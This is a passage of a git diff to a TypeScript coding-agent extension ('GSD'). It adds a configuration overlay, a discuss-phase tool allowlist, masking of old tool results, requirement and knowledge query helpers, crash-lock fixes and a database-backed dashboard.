= []; + + const globalPrefs = loadGlobalGSDPreferences(); + const projectPrefs = loadProjectGSDPreferences(); + const effective = loadEffectiveGSDPreferences(); + const prefs = effective?.preferences; + + // ─── Sources ───────────────────────────────────────────────────────── + sections.push({ + title: "Sources", + rows: [ + { label: "Global", value: globalPrefs ? globalPrefs.path : `(none) ${getGlobalGSDPreferencesPath()}` }, + { label: "Project", value: projectPrefs ? projectPrefs.path : `(none) ${getProjectGSDPreferencesPath()}` }, + ], + }); + + // ─── Profile ───────────────────────────────────────────────────────── + const profile = resolveEffectiveProfile(); + const profileRows: ConfigSection["rows"] = [ + { label: "Token profile", value: `${profile}${!prefs?.token_profile ? " (default)" : ""}`, accent: true }, + ]; + if (prefs?.mode) profileRows.push({ label: "Workflow mode", value: prefs.mode }); + sections.push({ title: "Profile", rows: profileRows }); + + // ─── Models ────────────────────────────────────────────────────────── + const unitTypes: Array<[string, string]> = [ + ["research", "research-milestone"], + ["planning", "plan-milestone"], + ["discuss", "discuss-milestone"], + ["execution", "execute-task"], + ["completion", "complete-slice"], + ["validation", "run-uat"], + ]; + + const modelRows: ConfigSection["rows"] = []; + for (const [label, unitType] of unitTypes) { + const resolved = resolveModelWithFallbacksForUnit(unitType); + if (resolved) { + let val = resolved.primary; + if (resolved.fallbacks.length > 0) { + val += ` \u2192 ${resolved.fallbacks.join(" \u2192 ")}`; + } + modelRows.push({ label, value: val }); + } else { + modelRows.push({ label, value: "(inherit)" }); + } + } + + // subagent is a direct config key + const models = prefs?.models as Record | undefined; + const subVal = models?.subagent; + if (subVal) { + const model = typeof subVal === "string" ? subVal : (subVal as { model?: string })?.model ?? "?"; + modelRows.push({ label: "subagent", value: model }); + } else { + modelRows.push({ label: "subagent", value: "(inherit)" }); + } + + sections.push({ title: "Models", rows: modelRows }); + + // ─── Dynamic Routing ───────────────────────────────────────────────── + const routing = resolveDynamicRoutingConfig(); + const routingRows: ConfigSection["rows"] = [ + { label: "Enabled", value: routing.enabled ? "yes" : "no", accent: routing.enabled }, + ]; + if (routing.enabled) { + routingRows.push({ label: "Escalate on fail", value: routing.escalate_on_failure !== false ? "yes" : "no" }); + routingRows.push({ label: "Budget pressure", value: routing.budget_pressure !== false ? "yes" : "no" }); + routingRows.push({ label: "Cross-provider", value: routing.cross_provider !== false ? "yes" : "no" }); + if (routing.tier_models) { + const tm = routing.tier_models; + if (tm.light) routingRows.push({ label: "[L] light", value: tm.light }); + if (tm.standard) routingRows.push({ label: "[S] standard", value: tm.standard }); + if (tm.heavy) routingRows.push({ label: "[H] heavy", value: tm.heavy }); + } + } + sections.push({ title: "Dynamic Routing", rows: routingRows }); + + // ─── Git ───────────────────────────────────────────────────────────── + if (prefs?.git) { + const g = prefs.git; + const gitRows: ConfigSection["rows"] = []; + if (g.isolation !== undefined) gitRows.push({ label: "Isolation", value: String(g.isolation) }); + if (g.auto_push !== undefined) gitRows.push({ label: "Auto push", value: String(g.auto_push) }); + if (g.push_branches !== undefined) gitRows.push({ label: "Push branches", value: String(g.push_branches) }); + if (g.merge_strategy) gitRows.push({ label: "Merge strategy", value: g.merge_strategy }); + if (g.main_branch) gitRows.push({ label: "Main branch", value: g.main_branch }); + if (g.remote) gitRows.push({ label: "Remote", value: g.remote }); + if (gitRows.length > 0) sections.push({ title: "Git", rows: gitRows }); + } + + // ─── Budget ────────────────────────────────────────────────────────── + if (prefs?.budget_ceiling !== undefined || prefs?.budget_enforcement) { + const budgetRows: ConfigSection["rows"] = []; + if (prefs.budget_ceiling !== undefined) budgetRows.push({ label: "Ceiling", value: `$${prefs.budget_ceiling}` }); + if (prefs.budget_enforcement) budgetRows.push({ label: "Enforcement", value: String(prefs.budget_enforcement) }); + sections.push({ title: "Budget", rows: budgetRows }); + } + + // ─── Auto Supervisor ───────────────────────────────────────────────── + if (prefs?.auto_supervisor) { + const sup = resolveAutoSupervisorConfig(); + const supRows: ConfigSection["rows"] = []; + if (sup.model) supRows.push({ label: "Model", value: sup.model }); + supRows.push({ label: "Soft timeout", value: `${sup.soft_timeout_minutes}m` }); + supRows.push({ label: "Idle timeout", value: `${sup.idle_timeout_minutes}m` }); + supRows.push({ label: "Hard timeout", value: `${sup.hard_timeout_minutes}m` }); + sections.push({ title: "Auto Supervisor", rows: supRows }); + } + + // ─── Toggles ───────────────────────────────────────────────────────── + const toggleRows: ConfigSection["rows"] = []; + if (prefs?.phases) { + const p = prefs.phases; + if (p.skip_research) toggleRows.push({ label: "skip_research", value: "on" }); + if (p.skip_reassess) toggleRows.push({ label: "skip_reassess", value: "on" }); + if (p.skip_slice_research) toggleRows.push({ label: "skip_slice_research", value: "on" }); + if (p.skip_milestone_validation) toggleRows.push({ label: "skip_milestone_validation", value: "on" }); + if (p.require_slice_discussion) toggleRows.push({ label: "require_slice_discussion", value: "on" }); + } + if (prefs?.uat_dispatch) toggleRows.push({ label: "uat_dispatch", value: "on" }); + if (prefs?.auto_visualize) toggleRows.push({ label: "auto_visualize", value: "on" }); + if (prefs?.auto_report === false) toggleRows.push({ label: "auto_report", value: "off" }); + if (prefs?.show_token_cost) toggleRows.push({ label: "show_token_cost", value: "on" }); + if (prefs?.forensics_dedup) toggleRows.push({ label: "forensics_dedup", value: "on" }); + if (prefs?.unique_milestone_ids) toggleRows.push({ label: "unique_milestone_ids", value: "on" }); + if (prefs?.service_tier) toggleRows.push({ label: "service_tier", value: prefs.service_tier }); + if (prefs?.search_provider && prefs.search_provider !== "auto") toggleRows.push({ label: "search_provider", value: prefs.search_provider }); + if (prefs?.context_selection) toggleRows.push({ label: "context_selection", value: prefs.context_selection }); + if (prefs?.widget_mode && prefs.widget_mode !== "full") toggleRows.push({ label: "widget_mode", value: prefs.widget_mode }); + if (prefs?.experimental?.rtk) toggleRows.push({ label: "experimental.rtk", value: "on" }); + if (toggleRows.length > 0) sections.push({ title: "Toggles", rows: toggleRows }); + + // ─── Parallel ──────────────────────────────────────────────────────── + if (prefs?.parallel) { + const pc = prefs.parallel; + const parallelRows: ConfigSection["rows"] = []; + if (pc.max_workers !== undefined) parallelRows.push({ label: "Max workers", value: String(pc.max_workers) }); + if (pc.merge_strategy) parallelRows.push({ label: "Merge strategy", value: pc.merge_strategy }); + if (pc.auto_merge) parallelRows.push({ label: "Auto merge", value: pc.auto_merge }); + if (parallelRows.length > 0) sections.push({ title: "Parallel", rows: parallelRows }); + } + + // ─── Hooks ─────────────────────────────────────────────────────────── + const postHooks = prefs?.post_unit_hooks?.filter(h => h.enabled !== false) ?? []; + const preHooks = prefs?.pre_dispatch_hooks?.filter(h => h.enabled !== false) ?? []; + if (postHooks.length > 0 || preHooks.length > 0) { + const hookRows: ConfigSection["rows"] = []; + if (preHooks.length > 0) hookRows.push({ label: "Pre-dispatch", value: `${preHooks.length} active` }); + if (postHooks.length > 0) hookRows.push({ label: "Post-unit", value: `${postHooks.length} active` }); + sections.push({ title: "Hooks", rows: hookRows }); + } + + // ─── Warnings ──────────────────────────────────────────────────────── + const warnings = [ + ...(globalPrefs?.warnings ?? []), + ...(projectPrefs?.warnings ?? []), + ]; + if (warnings.length > 0) { + sections.push({ + title: "Warnings", + rows: warnings.map(w => ({ label: "\u26a0", value: w })), + }); + } + + return sections; +} + +// ─── Plain Text Formatter (headless/RPC fallback) ───────────────────────── + +export function formatConfigText(): string { + const sections = collectConfigSections(); + const lines: string[] = ["GSD Configuration\n"]; + + let maxLabel = 0; + for (const section of sections) { + for (const row of section.rows) { + if (row.label.length > maxLabel) maxLabel = row.label.length; + } + } + const pad = Math.min(maxLabel + 2, 24); + + for (const section of sections) { + lines.push(""); + lines.push(section.title.toUpperCase()); + for (const row of section.rows) { + lines.push(` ${row.label.padEnd(pad)}${row.value}`); + } + } + + return lines.join("\n"); +} + +// ─── Overlay Class ──────────────────────────────────────────────────────── + +export class GSDConfigOverlay { + private tui: { requestRender: () => void }; + private theme: Theme; + private onClose: () => void; + private sections: ConfigSection[]; + private cachedLines?: string[]; + private scrollOffset = 0; + private disposed = false; + + constructor( + tui: { requestRender: () => void }, + theme: Theme, + onClose: () => void, + ) { + this.tui = tui; + this.theme = theme; + this.onClose = onClose; + this.sections = collectConfigSections(); + } + + invalidate(): void { + this.cachedLines = undefined; + } + + dispose(): void { + this.disposed = true; + } + + handleInput(data: string): void { + if (matchesKey(data, Key.escape) || data === "q") { + this.dispose(); + this.onClose(); + return; + } + if (matchesKey(data, Key.down) || data === "j") { + this.scrollOffset++; + this.cachedLines = undefined; + this.tui.requestRender(); + return; + } + if (matchesKey(data, Key.up) || data === "k") { + this.scrollOffset = Math.max(0, this.scrollOffset - 1); + this.cachedLines = undefined; + this.tui.requestRender(); + return; + } + if (matchesKey(data, Key.pageDown)) { + this.scrollOffset += 10; + this.cachedLines = undefined; + this.tui.requestRender(); + return; + } + if (matchesKey(data, Key.pageUp)) { + this.scrollOffset = Math.max(0, this.scrollOffset - 10); + this.cachedLines = undefined; + this.tui.requestRender(); + return; + } + } + + render(width: number): string[] { + if (this.cachedLines) return this.cachedLines; + + const t = this.theme; + const w = Math.max(width, 50); + const allLines: string[] = []; + + // Header + allLines.push(t.bold(t.fg("accent", " GSD Configuration "))); + allLines.push(t.fg("muted", "\u2500".repeat(w))); + + // Find max label width for alignment + let maxLabel = 0; + for (const section of this.sections) { + for (const row of section.rows) { + if (row.label.length > maxLabel) maxLabel = row.label.length; + } + } + const labelPad = Math.min(maxLabel + 2, 24); + + for (const section of this.sections) { + allLines.push(""); + allLines.push(t.bold(t.fg("accent", ` ${section.title}`))); + + for (const row of section.rows) { + const label = t.fg("muted", ` ${row.label.padEnd(labelPad)}`); + const value = row.accent ? t.bold(row.value) : row.value; + allLines.push(truncateToWidth(`${label}${value}`, w)); + } + } + + allLines.push(""); + allLines.push(t.fg("muted", ` ${"\u2500".repeat(w - 4)}`)); + allLines.push(t.fg("muted", " esc/q close \u2502 \u2191\u2193/jk scroll \u2502 /gsd prefs to edit")); + + // Apply scroll + const maxScroll = Math.max(0, allLines.length - 20); + this.scrollOffset = Math.min(this.scrollOffset, maxScroll); + const visible = allLines.slice(this.scrollOffset); + + this.cachedLines = visible; + return visible; + } +} diff --git a/src/resources/extensions/gsd/constants.ts b/src/resources/extensions/gsd/constants.ts index 636f2d808..15812dc93 100644 --- a/src/resources/extensions/gsd/constants.ts +++ b/src/resources/extensions/gsd/constants.ts @@ -19,3 +19,47 @@ export const DIR_CACHE_MAX = 200; /** Max parse-cache entries before eviction. */ export const CACHE_MAX = 50; + +// ─── Tool Scoping ───────────────────────────────────────────────────────────── + +/** + * GSD tools allowed during discuss flows (#2949). + * + * xAI/Grok (and potentially other providers with grammar-based constrained + * decoding) return "Grammar is too complex" (HTTP 400) when the combined + * tool schemas exceed their internal grammar limit. The full GSD tool set + * registers ~33 tools with deeply nested schemas; discuss flows only need + * a small subset. + * + * By scoping tools to this allowlist during discuss dispatches, the grammar + * sent to the provider stays well under provider limits. + * + * Included tools and why: + * - gsd_summary_save: writes CONTEXT.md artifacts (all discuss prompts) + * - gsd_save_summary: alias for above + * - gsd_decision_save: records decisions (discuss.md output phase) + * - gsd_save_decision: alias for above + * - gsd_plan_milestone: writes roadmap (discuss.md single/multi milestone) + * - gsd_milestone_plan: alias for above + * - gsd_milestone_generate_id: generates milestone IDs (discuss.md multi-milestone) + * - gsd_generate_milestone_id: alias for above + * - gsd_requirement_update: updates requirements during discuss + * - gsd_update_requirement: alias for above + */ +export const DISCUSS_TOOLS_ALLOWLIST: readonly string[] = [ + // Context / summary writing + "gsd_summary_save", + "gsd_save_summary", + // Decision recording + "gsd_decision_save", + "gsd_save_decision", + // Milestone planning (needed for discuss.md output phase) + "gsd_plan_milestone", + "gsd_milestone_plan", + // Milestone ID generation (multi-milestone flow) + "gsd_milestone_generate_id", + "gsd_generate_milestone_id", + // Requirement updates + "gsd_requirement_update", + "gsd_update_requirement", +]; diff --git a/src/resources/extensions/gsd/context-masker.ts b/src/resources/extensions/gsd/context-masker.ts new file mode 100644 index 000000000..824c3a91e --- /dev/null +++ b/src/resources/extensions/gsd/context-masker.ts @@ -0,0 +1,74 @@ +/** + * Observation masking for GSD auto-mode sessions. + * + * Replaces tool result content older than N turns with a placeholder. + * Reduces context bloat between compactions with zero LLM overhead. + * Preserves message ordering, roles, and all assistant/user messages. + * + * Operates on the pi-ai Message[] format (post-convertToLlm, pre-provider): + * - toolResult messages: { role: "toolResult", content: TextContent[] } + * - bash results are already converted to: { role: "user", content: [{type:"text",text:"..."}] } + * and start with "Ran `" from bashExecutionToText. + */ + +interface MaskableMessage { + role: string; + content: unknown; + type?: string; + [key: string]: unknown; +} + +const MASK_PLACEHOLDER = "[result masked — within summarized history]"; +const MASK_CONTENT_BLOCK = [{ type: "text" as const, text: MASK_PLACEHOLDER }]; + +function findTurnBoundary(messages: MaskableMessage[], keepRecentTurns: number): number { + let turnsSeen = 0; + for (let i = messages.length - 1; i >= 0; i--) { + const m = messages[i]; + // In the LLM payload, genuine user turns have role "user". + // Tool results have role "toolResult" and are excluded by this check. + if (m.role === "user") { + // Skip bash-result user messages (converted from bashExecution) — these aren't real user turns + if (isBashResultUserMessage(m)) continue; + turnsSeen++; + if (turnsSeen >= keepRecentTurns) return i; + } + } + return 0; +} + +/** + * Detect user messages that originated from bashExecution. + * After convertToLlm, these are {role: "user", content: [{type:"text", text:"Ran `cmd`\n..."}]}. + * The bashExecutionToText format always starts with "Ran `". + */ +function isBashResultUserMessage(m: MaskableMessage): boolean { + if (m.role !== "user" || !Array.isArray(m.content)) return false; + const first = m.content[0]; + return first && typeof first === "object" && "text" in first && + typeof first.text === "string" && first.text.startsWith("Ran `"); +} + +function isMaskableMessage(m: MaskableMessage): boolean { + // Tool result messages (role: "toolResult" in pi-ai format) + if (m.role === "toolResult") return true; + // Bash-result user messages (converted from bashExecution by convertToLlm) + if (isBashResultUserMessage(m)) return true; + return false; +} + +export function createObservationMask(keepRecentTurns: number = 8) { + return (messages: MaskableMessage[]): MaskableMessage[] => { + const boundary = findTurnBoundary(messages, keepRecentTurns); + if (boundary === 0) return messages; + + return messages.map((m, i) => { + if (i >= boundary) return m; + if (isMaskableMessage(m)) { + // Content may be string or array of content blocks — always replace with array + return { ...m, content: MASK_CONTENT_BLOCK }; + } + return m; + }); + }; +} diff --git a/src/resources/extensions/gsd/context-store.ts b/src/resources/extensions/gsd/context-store.ts index b23f1e855..df938555a 100644 --- a/src/resources/extensions/gsd/context-store.ts +++ b/src/resources/extensions/gsd/context-store.ts @@ -15,6 +15,7 @@ export interface DecisionQueryOpts { } export interface RequirementQueryOpts { + milestoneId?: string; sliceId?: string; status?: string; } @@ -67,7 +68,8 @@ export function queryDecisions(opts?: DecisionQueryOpts): Decision[] { /** * Query active (non-superseded) requirements with optional filters. - * - sliceId: filters where primary_owner LIKE '%sliceId%' OR supporting_slices LIKE '%sliceId%' + * - milestoneId: combined with sliceId for precise filtering (e.g. %M005/S01%) + * - sliceId: filters where primary_owner LIKE '%pattern%' OR supporting_slices LIKE '%pattern%' * - status: filters where status = :status (exact match) * * Returns [] if DB is not available. Never throws. @@ -81,9 +83,19 @@ export function queryRequirements(opts?: RequirementQueryOpts): Requirement[] { const clauses: string[] = ['superseded_by IS NULL']; const params: Record = {}; - if (opts?.sliceId) { + // Combined milestone+slice filtering for precise scoping + if (opts?.milestoneId && opts?.sliceId) { + // Use combined pattern like %M005/S01% to avoid cross-milestone contamination + clauses.push('(primary_owner LIKE :combined_pattern OR supporting_slices LIKE :combined_pattern)'); + params[':combined_pattern'] = `%${opts.milestoneId}/${opts.sliceId}%`; + } else if (opts?.sliceId) { + // Slice-only filtering (legacy behavior) clauses.push('(primary_owner LIKE :slice_pattern OR supporting_slices LIKE :slice_pattern)'); params[':slice_pattern'] = `%${opts.sliceId}%`; + } else if (opts?.milestoneId) { + // Milestone-only filtering + clauses.push('(primary_owner LIKE :milestone_pattern OR supporting_slices LIKE :milestone_pattern)'); + params[':milestone_pattern'] = `%${opts.milestoneId}%`; } if (opts?.status) { @@ -194,3 +206,156 @@ export function queryArtifact(path: string): string | null { export function queryProject(): string | null { return queryArtifact('PROJECT.md'); } + +// ─── Knowledge Query ─────────────────────────────────────────────────────── + +/** + * Filter KNOWLEDGE.md sections by keyword matching. + * Uses H2 sections, matches keywords case-insensitively against: + * 1. Section header text + * 2. First paragraph of section content (up to first blank line or next heading) + * + * Per D020, returns empty string (not null) when no matches found. + * This signals "no relevant knowledge" vs "file not found". + * + * @param content - Full KNOWLEDGE.md content + * @param keywords - Keywords to match (case-insensitive) + * @returns Concatenated matching sections with H2 headers, or empty string + */ +export async function queryKnowledge(content: string, keywords: string[]): Promise { + if (!content || keywords.length === 0) return ''; + + // Lazy import to avoid circular dependency + const { extractAllSections } = await import('./files.js'); + + const sections = extractAllSections(content, 2); + if (sections.size === 0) return ''; + + // Normalize keywords for case-insensitive matching + const normalizedKeywords = keywords.map(k => k.toLowerCase()); + + const matchingSections: string[] = []; + + for (const [header, body] of sections) { + // Extract first paragraph: everything up to first blank line or next heading + const firstParagraph = body.split(/\n\s*\n|\n#/)[0] || ''; + + // Check if any keyword matches header or first paragraph + const headerLower = header.toLowerCase(); + const paragraphLower = firstParagraph.toLowerCase(); + + const matches = normalizedKeywords.some(kw => + headerLower.includes(kw) || paragraphLower.includes(kw) + ); + + if (matches) { + matchingSections.push(`## ${header}\n\n${body}`); + } + } + + return matchingSections.join('\n\n'); +} + +// ─── Roadmap Excerpt Formatter ───────────────────────────────────────────── + +/** + * Format a minimal roadmap excerpt for prompt injection. + * Parses the slice table from roadmap content, extracts: + * 1. Header row + separator + * 2. Predecessor row (if sliceId depends on one via the Depends column) + * 3. Target slice row + * 4. Reference directive pointing to full roadmap path + * + * Per D021, this minimizes injected content while preserving dependency awareness. + * Returns empty string if sliceId is not found in the table. + * Never throws. + * + * @param roadmapContent - Full content of the M###-ROADMAP.md file + * @param sliceId - Target slice ID (e.g. 'S02') + * @param roadmapPath - Optional path for reference directive (defaults to generic) + */ +export function formatRoadmapExcerpt( + roadmapContent: string, + sliceId: string, + roadmapPath = 'ROADMAP.md', +): string { + if (!roadmapContent || !sliceId) return ''; + + const lines = roadmapContent.split('\n'); + + // Find the slice table header: | ID | Slice | ... (case insensitive) + let headerIndex = -1; + for (let i = 0; i < lines.length; i++) { + const line = lines[i]; + if (line && /^\s*\|\s*ID\s*\|\s*Slice\s*\|/i.test(line)) { + headerIndex = i; + break; + } + } + + if (headerIndex === -1) return ''; + + // The separator should be the next line (|---|---|...) + const separatorIndex = headerIndex + 1; + if (separatorIndex >= lines.length) return ''; + + const headerLine = lines[headerIndex]; + const separatorLine = lines[separatorIndex]; + + // Validate separator line looks like |---|---|... (may include : for alignment) + if (!separatorLine || !/^\s*\|[\s:\-|]+\|/.test(separatorLine)) return ''; + + // Parse table rows after separator + interface SliceRow { + line: string; + id: string; + depends: string; + } + + const sliceRows: SliceRow[] = []; + for (let i = separatorIndex + 1; i < lines.length; i++) { + const line = lines[i]; + if (!line || !line.trim().startsWith('|')) break; // End of table + + // Parse row: | ID | Slice | Risk | Depends | Done | After this | + const cells = line.split('|').map(c => c.trim()); + // cells[0] is empty (before first |), cells[1] is ID, etc. + if (cells.length < 5) continue; + + const id = cells[1] || ''; + const depends = cells[4] || ''; // Depends column (0-indexed: empty, ID, Slice, Risk, Depends, ...) + + sliceRows.push({ line, id, depends }); + } + + // Find target slice row + const targetRow = sliceRows.find(r => r.id === sliceId); + if (!targetRow) return ''; + + // Find predecessor if target depends on one + // Depends column may contain: '—', 'S01', 'S01, S02', etc. + let predecessorRow: SliceRow | undefined; + const dependsRaw = targetRow.depends; + if (dependsRaw && dependsRaw !== '—' && dependsRaw !== '-') { + // Extract first dependency (e.g. 'S01' from 'S01, S02') + const depMatch = dependsRaw.match(/S\d+/); + if (depMatch) { + predecessorRow = sliceRows.find(r => r.id === depMatch[0]); + } + } + + // Build excerpt + const excerptLines: string[] = [headerLine!, separatorLine!]; + + if (predecessorRow) { + excerptLines.push(predecessorRow.line); + } + + excerptLines.push(targetRow.line); + + // Add reference directive + excerptLines.push(''); + excerptLines.push(`> See full roadmap: ${roadmapPath}`); + + return excerptLines.join('\n'); +} diff --git a/src/resources/extensions/gsd/crash-recovery.ts b/src/resources/extensions/gsd/crash-recovery.ts index 8db786026..1b147fead 100644 --- a/src/resources/extensions/gsd/crash-recovery.ts +++ b/src/resources/extensions/gsd/crash-recovery.ts @@ -14,8 +14,7 @@ import { readFileSync, unlinkSync, existsSync } from "node:fs"; import { join } from "node:path"; import { gsdRoot } from "./paths.js"; import { atomicWriteSync } from "./atomic-write.js"; - -const LOCK_FILE = "auto.lock"; +import { effectiveLockFile } from "./session-lock.js"; export interface LockData { pid: number; @@ -23,13 +22,12 @@ export interface LockData { unitType: string; unitId: string; unitStartedAt: string; - completedUnits: number; /** Path to the pi session JSONL file that was active when this unit started. */ sessionFile?: string; } function lockPath(basePath: string): string { - return join(gsdRoot(basePath), LOCK_FILE); + return join(gsdRoot(basePath), effectiveLockFile()); } /** Write or update the lock file with current auto-mode state. */ @@ -37,7 +35,6 @@ export function writeLock( basePath: string, unitType: string, unitId: string, - completedUnits: number, sessionFile?: string, ): void { try { @@ -47,7 +44,6 @@ export function writeLock( unitType, unitId, unitStartedAt: new Date().toISOString(), - completedUnits, sessionFile, }; const lp = lockPath(basePath); @@ -79,12 +75,16 @@ export function readCrashLock(basePath: string): LockData | null { /** * Check whether the process that wrote the lock is still running. * Uses `process.kill(pid, 0)` which sends no signal but checks liveness. - * Returns false if the PID matches our own (recycled PID from a prior run). + * Returns true if the PID matches our own — we are the lock holder (#2470). */ export function isLockProcessAlive(lock: LockData): boolean { const pid = lock.pid; if (!Number.isInteger(pid) || pid <= 0) return false; - if (pid === process.pid) return false; + // Our own PID means WE hold this lock — we are alive. (#2470) + // Callers that need to distinguish "our lock" from "someone else's lock" + // (e.g. startAuto checking for a prior crashed session with a recycled PID) + // already guard with `crashLock.pid !== process.pid` before calling us. + if (pid === process.pid) return true; try { process.kill(pid, 0); return true; @@ -102,12 +102,11 @@ export function formatCrashInfo(lock: LockData): string { `Previous auto-mode session was interrupted.`, ` Was executing: ${lock.unitType} (${lock.unitId})`, ` Started at: ${lock.unitStartedAt}`, - ` Units completed before crash: ${lock.completedUnits}`, ` PID: ${lock.pid}`, ]; // Add recovery guidance based on what was happening when it crashed - if (lock.unitType === "starting" && lock.unitId === "bootstrap" && lock.completedUnits === 0) { + if (lock.unitType === "starting" && lock.unitId === "bootstrap") { lines.push(`No work was lost. Run /gsd auto to restart.`); } else if (lock.unitType.includes("research") || lock.unitType.includes("plan")) { lines.push(`The ${lock.unitType} unit may be incomplete. Run /gsd auto to re-run it.`); diff --git a/src/resources/extensions/gsd/custom-execution-policy.ts b/src/resources/extensions/gsd/custom-execution-policy.ts index 6912c83f4..656873682 100644 --- a/src/resources/extensions/gsd/custom-execution-policy.ts +++ b/src/resources/extensions/gsd/custom-execution-policy.ts @@ -14,6 +14,7 @@ import type { ExecutionPolicy } from "./execution-policy.js"; import type { RecoveryAction, CloseoutResult } from "./engine-types.js"; import { runCustomVerification } from "./custom-verification.js"; +import { parseUnitId } from "./unit-id.js"; export class CustomExecutionPolicy implements ExecutionPolicy { private readonly runDir: string; @@ -48,8 +49,8 @@ export class CustomExecutionPolicy implements ExecutionPolicy { unitId: string, _context: { basePath: string }, ): Promise<"continue" | "retry" | "pause"> { - const parts = unitId.split("/"); - const stepId = parts[parts.length - 1]; + const { milestone, slice, task } = parseUnitId(unitId); + const stepId = task ?? slice ?? milestone; return runCustomVerification(this.runDir, stepId); } diff --git a/src/resources/extensions/gsd/custom-verification.ts b/src/resources/extensions/gsd/custom-verification.ts index 6c9a28b72..77d76d30e 100644 --- a/src/resources/extensions/gsd/custom-verification.ts +++ b/src/resources/extensions/gsd/custom-verification.ts @@ -17,11 +17,13 @@ * - The frozen DEFINITION.yaml on disk is the single source of truth for step policies. */ +import { logWarning } from "./workflow-logger.js"; import { readFileSync, existsSync, statSync } from "node:fs"; import { join, resolve, sep } from "node:path"; import { spawnSync } from "node:child_process"; import type { StepDefinition, VerifyPolicy } from "./definition-loader.js"; import { readFrozenDefinition } from "./custom-workflow-engine.js"; +import { rewriteCommandWithRtk } from "../shared/rtk.js"; /** Verification outcome type — matches ExecutionPolicy.verify() return type. */ export type VerificationOutcome = "continue" | "retry" | "pause"; @@ -129,8 +131,8 @@ function handleContentHeuristic( if (!new RegExp(verify.pattern).test(content)) { return "pause"; } - } catch { - // Invalid regex at runtime — treat as verification failure + } catch (e) { + logWarning("engine", `content-heuristic regex failed: ${(e as Error).message}`); return "pause"; } } @@ -164,7 +166,8 @@ function handleShellCommand( return "pause"; } - const result = spawnSync("sh", ["-c", verify.command], { + const rewrittenCommand = rewriteCommandWithRtk(verify.command); + const result = spawnSync("sh", ["-c", rewrittenCommand], { cwd: runDir, timeout: 30_000, encoding: "utf-8", diff --git a/src/resources/extensions/gsd/custom-workflow-engine.ts b/src/resources/extensions/gsd/custom-workflow-engine.ts index 49e71a4bd..bcdbc8f4d 100644 --- a/src/resources/extensions/gsd/custom-workflow-engine.ts +++ b/src/resources/extensions/gsd/custom-workflow-engine.ts @@ -33,6 +33,7 @@ import { } from "./graph.js"; import { injectContext } from "./context-injector.js"; import type { WorkflowDefinition, StepDefinition } from "./definition-loader.js"; +import { parseUnitId } from "./unit-id.js"; /** Read and parse the frozen DEFINITION.yaml from a run directory. */ export function readFrozenDefinition(runDir: string): WorkflowDefinition { @@ -178,11 +179,13 @@ export class CustomWorkflowEngine implements WorkflowEngine { state: EngineState, completedStep: CompletedStep, ): Promise { - const graph = state.raw as WorkflowGraph; + // Re-read the graph from disk so we do not overwrite concurrent + // workflow edits with a stale in-memory snapshot from deriveState(). + const graph = readGraph(this.runDir); // Extract stepId from "/" - const parts = completedStep.unitId.split("/"); - const stepId = parts[parts.length - 1]; + const { milestone, slice, task } = parseUnitId(completedStep.unitId); + const stepId = task ?? slice ?? milestone; const updatedGraph = markStepComplete(graph, stepId); writeGraph(this.runDir, updatedGraph); diff --git a/src/resources/extensions/gsd/dashboard-overlay.ts b/src/resources/extensions/gsd/dashboard-overlay.ts index a7945398c..37bd547fb 100644 --- a/src/resources/extensions/gsd/dashboard-overlay.ts +++ b/src/resources/extensions/gsd/dashboard-overlay.ts @@ -9,7 +9,8 @@ import type { Theme } from "@gsd/pi-coding-agent"; import { truncateToWidth, visibleWidth, matchesKey, Key } from "@gsd/pi-tui"; import { deriveState } from "./state.js"; -import { loadFile, parseRoadmap, parsePlan } from "./files.js"; +import { loadFile } from "./files.js"; +import { isDbAvailable, getMilestoneSlices, getSliceTasks } from "./gsd-db.js"; import { resolveMilestoneFile, resolveSliceFile } from "./paths.js"; import { getAutoDashboardData } from "./auto.js"; import type { AutoDashboardData } from "./auto-dashboard.js"; @@ -28,6 +29,8 @@ import { runEnvironmentChecks, type EnvironmentCheckResult } from "./doctor-envi function unitLabel(type: string): string { switch (type) { + case "discuss-milestone": + case "discuss-slice": return "Discuss"; case "research-milestone": return "Research"; case "plan-milestone": return "Plan"; case "research-slice": return "Research"; @@ -98,18 +101,11 @@ export class GSDDashboardOverlay { const currentUnit = dashData.currentUnit ? `${dashData.currentUnit.type}:${dashData.currentUnit.id}:${dashData.currentUnit.startedAt}` : "-"; - const lastCompleted = dashData.completedUnits.length > 0 - ? dashData.completedUnits[dashData.completedUnits.length - 1] - : null; - const completedKey = lastCompleted - ? `${dashData.completedUnits.length}:${lastCompleted.type}:${lastCompleted.id}:${lastCompleted.finishedAt}` - : "0"; return [ base, dashData.active ? "1" : "0", dashData.paused ? "1" : "0", currentUnit, - completedKey, ].join("|"); } @@ -159,9 +155,14 @@ export class GSDDashboardOverlay { const roadmapFile = resolveMilestoneFile(base, mid, "ROADMAP"); const roadmapContent = roadmapFile ? await loadFile(roadmapFile) : null; - if (roadmapContent) { - const roadmap = parseRoadmap(roadmapContent); - for (const s of roadmap.slices) { + // Normalize slices from DB + type NormSlice = { id: string; done: boolean; title: string; risk: string }; + let normSlices: NormSlice[] = []; + if (isDbAvailable()) { + normSlices = getMilestoneSlices(mid).map(s => ({ id: s.id, done: s.status === "complete", title: s.title, risk: s.risk || "medium" })); + } + + for (const s of normSlices) { const sliceView: SliceView = { id: s.id, title: s.title, @@ -172,19 +173,18 @@ export class GSDDashboardOverlay { }; if (sliceView.active) { - const planFile = resolveSliceFile(base, mid, s.id, "PLAN"); - const planContent = planFile ? await loadFile(planFile) : null; - if (planContent) { - const plan = parsePlan(planContent); + // Normalize tasks from DB + if (isDbAvailable()) { + const dbTasks = getSliceTasks(mid, s.id); sliceView.taskProgress = { - done: plan.tasks.filter(t => t.done).length, - total: plan.tasks.length, + done: dbTasks.filter(t => t.status === "complete" || t.status === "done").length, + total: dbTasks.length, }; - for (const t of plan.tasks) { + for (const t of dbTasks) { sliceView.tasks.push({ id: t.id, title: t.title, - done: t.done, + done: t.status === "complete" || t.status === "done", active: state.activeTask?.id === t.id, }); } @@ -192,7 +192,6 @@ export class GSDDashboardOverlay { } view.slices.push(sliceView); - } } this.milestoneData = view; @@ -454,49 +453,6 @@ export class GSDDashboardOverlay { lines.push(centered(th.fg("dim", "No active milestone."))); } - if (this.dashData.completedUnits.length > 0) { - lines.push(blank()); - lines.push(hr()); - lines.push(row(th.fg("text", th.bold("Completed")))); - lines.push(blank()); - - // Build ledger lookup for budget indicators (last entry wins for retries) - const ledgerLookup = new Map(); - const currentLedger = getLedger(); - if (currentLedger) { - for (const lu of currentLedger.units) { - ledgerLookup.set(`${lu.type}:${lu.id}`, lu); - } - } - - const recent = [...this.dashData.completedUnits].reverse().slice(0, 10); - for (const u of recent) { - // Budget indicators from 